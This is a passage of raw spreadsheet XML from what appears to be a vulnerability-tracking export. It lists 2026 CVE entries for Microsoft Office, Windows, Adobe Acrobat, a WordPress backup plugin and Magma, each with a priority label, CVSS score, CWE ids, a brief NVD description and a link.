t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1937" s="5" t="inlineStr" /><c r="H1937" s="5" t="n"><v>0.005</v></c><c r="I1937" s="5" t="inlineStr" /><c r="J1937" s="5" t="inlineStr" /><c r="K1937" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1937" s="5" t="inlineStr" /><c r="M1937" s="5" t="inlineStr" /><c r="N1937" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1937" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1937" s="5" t="inlineStr" /><c r="Q1937" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="R1937" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1937" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t></is></c></row><row r="1938"><c r="A1938" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1938" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1938" s="5" t="inlineStr"><is><t>CVE-2026-81393</t></is></c><c r="D1938" s="5" t="n"><v>5.5</v></c><c r="E1938" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1938" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1938" s="5" t="inlineStr" /><c r="H1938" s="5" t="n"><v>0.004</v></c><c r="I1938" s="5" t="inlineStr" /><c r="J1938" s="5" t="inlineStr" /><c r="K1938" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1938" s="5" t="inlineStr" /><c r="M1938" s="5" t="inlineStr" /><c r="N1938" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1938" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1938" s="5" t="inlineStr" /><c r="Q1938" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1938" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1938" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t></is></c></row><row r="1939"><c r="A1939" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1939" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1939" s="5" t="inlineStr"><is><t>CVE-2026-81394</t></is></c><c r="D1939" s="5" t="n"><v>5.5</v></c><c r="E1939" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1939" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1939" s="5" t="inlineStr" /><c r="H1939" s="5" t="n"><v>0.004</v></c><c r="I1939" s="5" t="inlineStr" /><c r="J1939" s="5" t="inlineStr" /><c r="K1939" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1939" s="5" t="inlineStr" /><c r="M1939" s="5" t="inlineStr" /><c r="N1939" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1939" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1939" s="5" t="inlineStr" /><c r="Q1939" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1939" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1939" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t></is></c></row><row r="1940"><c r="A1940" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1940" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1940" s="5" t="inlineStr"><is><t>CVE-2026-81395</t></is></c><c r="D1940" s="5" t="n"><v>5.5</v></c><c r="E1940" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1940" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1940" s="5" t="inlineStr" /><c r="H1940" s="5" t="n"><v>0.005</v></c><c r="I1940" s="5" t="inlineStr" /><c r="J1940" s="5" t="inlineStr" /><c r="K1940" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1940" s="5" t="inlineStr" /><c r="M1940" s="5" t="inlineStr" /><c r="N1940" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1940" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1940" s="5" t="inlineStr" /><c r="Q1940" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1940" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1940" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t></is></c></row><row r="1941"><c r="A1941" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1941" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1941" s="5" t="inlineStr"><is><t>CVE-2026-81399</t></is></c><c r="D1941" s="5" t="n"><v>5.5</v></c><c r="E1941" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1941" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1941" s="5" t="inlineStr" /><c r="H1941" s="5" t="n"><v>0.004</v></c><c r="I1941" s="5" t="inlineStr" /><c r="J1941" s="5" t="inlineStr" /><c r="K1941" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1941" s="5" t="inlineStr" /><c r="M1941" s="5" t="inlineStr" /><c r="N1941" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1941" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1941" s="5" t="inlineStr" /><c r="Q1941" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1941" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1941" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t></is></c></row><row r="1942"><c r="A1942" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1942" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1942" s="5" t="inlineStr"><is><t>CVE-2026-81400</t></is></c><c r="D1942" s="5" t="n"><v>5.5</v></c><c r="E1942" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1942" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1942" s="5" t="inlineStr" /><c r="H1942" s="5" t="n"><v>0.004</v></c><c r="I1942" s="5" t="inlineStr" /><c r="J1942" s="5" t="inlineStr" /><c r="K1942" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1942" s="5" t="inlineStr" /><c r="M1942" s="5" t="inlineStr" /><c r="N1942" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1942" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1942" s="5" t="inlineStr" /><c r="Q1942" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1942" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1942" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t></is></c></row><row r="1943"><c r="A1943" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1943" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1943" s="5" t="inlineStr"><is><t>CVE-2026-81401</t></is></c><c r="D1943" s="5" t="n"><v>5.5</v></c><c r="E1943" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1943" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1943" s="5" t="inlineStr" /><c r="H1943" s="5" t="n"><v>0.005</v></c><c r="I1943" s="5" t="inlineStr" /><c r="J1943" s="5" t="inlineStr" /><c r="K1943" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1943" s="5" t="inlineStr" /><c r="M1943" s="5" t="inlineStr" /><c r="N1943" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1943" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1943" s="5" t="inlineStr" /><c r="Q1943" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1943" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1943" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t></is></c></row><row r="1944"><c r="A1944" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1944" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1944" s="5" t="inlineStr"><is><t>CVE-2026-81958</t></is></c><c r="D1944" s="5" t="n"><v>5.5</v></c><c r="E1944" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1944" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1944" s="5" t="inlineStr" /><c r="H1944" s="5" t="n"><v>0.004</v></c><c r="I1944" s="5" t="inlineStr" /><c r="J1944" s="5" t="inlineStr" /><c r="K1944" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1944" s="5" t="inlineStr" /><c r="M1944" s="5" t="inlineStr" /><c r="N1944" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1944" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1944" s="5" t="inlineStr" /><c r="Q1944" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1944" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1944" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t></is></c></row><row r="1945"><c r="A1945" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1945" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1945" s="5" t="inlineStr"><is><t>CVE-2026-81977</t></is></c><c r="D1945" s="5" t="n"><v>5.5</v></c><c r="E1945" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1945" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1945" s="5" t="inlineStr" /><c r="H1945" s="5" t="n"><v>0.002</v></c><c r="I1945" s="5" t="inlineStr" /><c r="J1945" s="5" t="inlineStr" /><c r="K1945" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1945" s="5" t="inlineStr" /><c r="M1945" s="5" t="inlineStr" /><c r="N1945" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1945" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1945" s="5" t="inlineStr" /><c r="Q1945" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1945" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1945" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t></is></c></row><row r="1946"><c r="A1946" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1946" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1946" s="5" t="inlineStr"><is><t>CVE-2026-81978</t></is></c><c r="D1946" s="5" t="n"><v>5.5</v></c><c r="E1946" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1946" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1946" s="5" t="inlineStr" /><c r="H1946" s="5" t="n"><v>0.002</v></c><c r="I1946" s="5" t="inlineStr" /><c r="J1946" s="5" t="inlineStr" /><c r="K1946" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1946" s="5" t="inlineStr" /><c r="M1946" s="5" t="inlineStr" /><c r="N1946" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1946" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1946" s="5" t="inlineStr" /><c r="Q1946" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1946"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46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t></is></c></row><row r="1947"><c r="A1947" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1947" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1947" s="5" t="inlineStr"><is><t>CVE-2026-81982</t></is></c><c r="D1947" s="5" t="n"><v>5.5</v></c><c r="E1947" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1947" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1947" s="5" t="inlineStr" /><c r="H1947" s="5" t="n"><v>0.002</v></c><c r="I1947" s="5" t="inlineStr" /><c r="J1947" s="5" t="inlineStr" /><c r="K1947" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1947" s="5" t="inlineStr" /><c r="M1947" s="5" t="inlineStr" /><c r="N1947" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1947" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1947" s="5" t="inlineStr" /><c r="Q1947" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1947"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47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t></is></c></row><row r="1948"><c r="A1948" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1948" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1948" s="5" t="inlineStr"><is><t>CVE-2026-81984</t></is></c><c r="D1948" s="5" t="n"><v>5.5</v></c><c r="E1948" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1948" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1948" s="5" t="inlineStr" /><c r="H1948" s="5" t="n"><v>0.002</v></c><c r="I1948" s="5" t="inlineStr" /><c r="J1948" s="5" t="inlineStr" /><c r="K1948" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1948" s="5" t="inlineStr" /><c r="M1948" s="5" t="inlineStr" /><c r="N1948" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1948" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1948" s="5" t="inlineStr" /><c r="Q1948" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1948" s="5" t="inlineStr"><is><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is></c><c r="S1948" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t></is></c></row><row r="1949"><c r="A1949" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1949" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1949" s="5" t="inlineStr"><is><t>CVE-2026-81991</t></is></c><c r="D1949" s="5" t="n"><v>5.5</v></c><c r="E1949" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1949" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1949" s="5" t="inlineStr" /><c r="H1949" s="5" t="n"><v>0.002</v></c><c r="I1949" s="5" t="inlineStr" /><c r="J1949" s="5" t="inlineStr" /><c r="K1949" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1949" s="5" t="inlineStr" /><c r="M1949" s="5" t="inlineStr" /><c r="N1949" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1949" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1949" s="5" t="inlineStr" /><c r="Q1949" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1949" s="5" t="inlineStr"><is><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is></c><c r="S1949" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t></is></c></row><row r="1950"><c r="A1950" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1950" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1950" s="5" t="inlineStr"><is><t>CVE-2026-81993</t></is></c><c r="D1950" s="5" t="n"><v>5.5</v></c><c r="E1950" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1950" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1950" s="5" t="inlineStr" /><c r="H1950" s="5" t="n"><v>0.002</v></c><c r="I1950" s="5" t="inlineStr" /><c r="J1950" s="5" t="inlineStr" /><c r="K1950" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1950" s="5" t="inlineStr" /><c r="M1950" s="5" t="inlineStr" /><c r="N1950" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1950" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1950" s="5" t="inlineStr" /><c r="Q1950" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1950" s="5" t="inlineStr"><is><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is></c><c r="S1950" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t></is></c></row><row r="1951"><c r="A1951" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1951" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1951" s="5" t="inlineStr"><is><t>CVE-2026-82001</t></is></c><c r="D1951" s="5" t="n"><v>5.5</v></c><c r="E1951" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1951" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1951" s="5" t="inlineStr" /><c r="H1951" s="5" t="n"><v>0.002</v></c><c r="I1951" s="5" t="inlineStr" /><c r="J1951" s="5" t="inlineStr" /><c r="K1951" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1951" s="5" t="inlineStr" /><c r="M1951" s="5" t="inlineStr" /><c r="N1951" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1951" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1951" s="5" t="inlineStr" /><c r="Q1951" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1951" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1951" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t></is></c></row><row r="1952"><c r="A1952" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1952" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1952" s="5" t="inlineStr"><is><t>CVE-2026-82193</t></is></c><c r="D1952" s="5" t="n"><v>5.5</v></c><c r="E1952" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1952" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1952" s="5" t="inlineStr" /><c r="H1952" s="5" t="n"><v>0.003</v></c><c r="I1952" s="5" t="inlineStr" /><c r="J1952" s="5" t="inlineStr" /><c r="K1952" s="5" t="inlineStr" /><c r="L1952" s="5" t="inlineStr" /><c r="M1952" s="5" t="inlineStr" /><c r="N1952" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1952" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1952" s="5" t="inlineStr" /><c r="Q1952" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1952" s="5" t="inlineStr"><is><t>The WPvivid — Backup, Migration &amp; Staging WordPress plugin before 0.9.134 does not validate a user supplied file name before using it to build a write path, allowing administrators to write files of permitted types to arbitrary locations on the server and to overwrite existing files.</t></is></c><c r="S1952" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82193</t></is></c></row><row r="1953"><c r="A1953" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1953" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1953" s="5" t="inlineStr"><is><t>CVE-2026-82194</t></is></c><c r="D1953" s="5" t="n"><v>5.5</v></c><c r="E1953" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1953" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1953" s="5" t="inlineStr" /><c r="H1953" s="5" t="n"><v>0.002</v></c><c r="I1953" s="5" t="inlineStr" /><c r="J1953" s="5" t="inlineStr" /><c r="K1953" s="5" t="inlineStr" /><c r="L1953" s="5" t="inlineStr" /><c r="M1953" s="5" t="inlineStr" /><c r="N1953" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1953" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1953" s="5" t="inlineStr" /><c r="Q1953" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R1953" s="5" t="inlineStr"><is><t>The WPvivid — Backup, Migration &amp; Staging WordPress plugin before 0.9.134 does not validate a user supplied path before using it in a file deletion routine, allowing administrators to delete arbitrary files on the server, including files outside the web root.</t></is></c><c r="S1953" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82194</t></is></c></row><row r="1954"><c r="A1954" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1954" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1954" s="5" t="inlineStr"><is><t>CVE-2026-82547</t></is></c><c r="D1954" s="5" t="n"><v>5.5</v></c><c r="E1954" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1954" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1954" s="5" t="inlineStr" /><c r="H1954" s="5" t="n"><v>0.004</v></c><c r="I1954" s="5" t="inlineStr" /><c r="J1954" s="5" t="inlineStr" /><c r="K1954" s="5" t="inlineStr" /><c r="L1954" s="5" t="inlineStr" /><c r="M1954" s="5" t="inlineStr" /><c r="N1954" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1954" s="5" t="inlineStr"><is><t>2026-08-30</t></is></c><c r="P1954" s="5" t="inlineStr" /><c r="Q1954" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R1954" s="5" t="inlineStr"><is><t>A vulnerability was found in Linux Foundation Magma 1.9.0. The affected element is an unknown function of the file tasks/amf/amf_fsm.cpp of the component Registration Complete Message Handler. The manipulation results in improper authentication. The attack can be launched remotely. The exploit has been made public and could be used.</t></is></c><c r="S1954" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82547</t></is></c></row><row r="1955"><c r="A1955" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1955" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1955" s="5" t="inlineStr"><is><t>CVE-2026-83501</t></is></c><c r="D1955" s="5" t="n"><v>5.5</v></c><c r="E1955" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1955" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1955" s="5" t="inlineStr" /><c r="H1955" s="5" t="n"><v>0.003</v></c><c r="I1955" s="5" t="inlineStr" /><c r="J1955" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1955" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1955" s="5" t="inlineStr" /><c r="M1955" s="5" t="inlineStr" /><c r="N1955" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1955" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1955" s="5" t="inlineStr" /><c r="Q1955" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1955" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t></is></c><c r="S1955" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t></is></c></row><row r="1956"><c r="A1956" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1956" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1956" s="5" t="inlineStr"><is><t>CVE-2026-83949</t></is></c><c r="D1956" s="5" t="n"><v>5.5</v></c><c r="E1956" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1956" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1956" s="5" t="inlineStr" /><c r="H1956" s="5" t="n"><v>0.004</v></c><c r="I1956" s="5" t="inlineStr" /><c r="J1956" s="5" t="inlineStr" /><c r="K1956" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1956" s="5" t="inlineStr" /><c r="M1956" s="5" t="inlineStr" /><c r="N1956" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1956" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1956" s="5" t="inlineStr" /><c r="Q1956" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1956" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1956" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t></is></c></row><row r="1957"><c r="A1957" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1957" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1957" s="5" t="inlineStr"><is><t>CVE-2026-83951</t></is></c><c r="D1957" s="5" t="n"><v>5.5</v></c><c r="E1957" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1957" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1957" s="5" t="inlineStr" /><c r="H1957" s="5" t="n"><v>0.004</v></c><c r="I1957" s="5" t="inlineStr" /><c r="J1957" s="5" t="inlineStr" /><c r="K1957" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1957" s="5" t="inlineStr" /><c r="M1957" s="5" t="inlineStr" /><c r="N1957" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1957" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1957" s="5" t="inlineStr" /><c r="Q1957" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1957" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1957" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t></is></c></row><row r="1958"><c r="A1958" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1958" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1958" s="5" t="inlineStr"><is><t>CVE-2026-83991</t></is></c><c r="D1958" s="5" t="n"><v>5.5</v></c><c r="E1958" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1958" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1958" s="5" t="inlineStr" /><c r="H1958" s="5" t="n"><v>0.003</v></c><c r="I1958" s="5" t="inlineStr" /><c r="J1958" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1958"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1958" s="5" t="inlineStr" /><c r="M1958" s="5" t="inlineStr" /><c r="N1958" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1958" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c 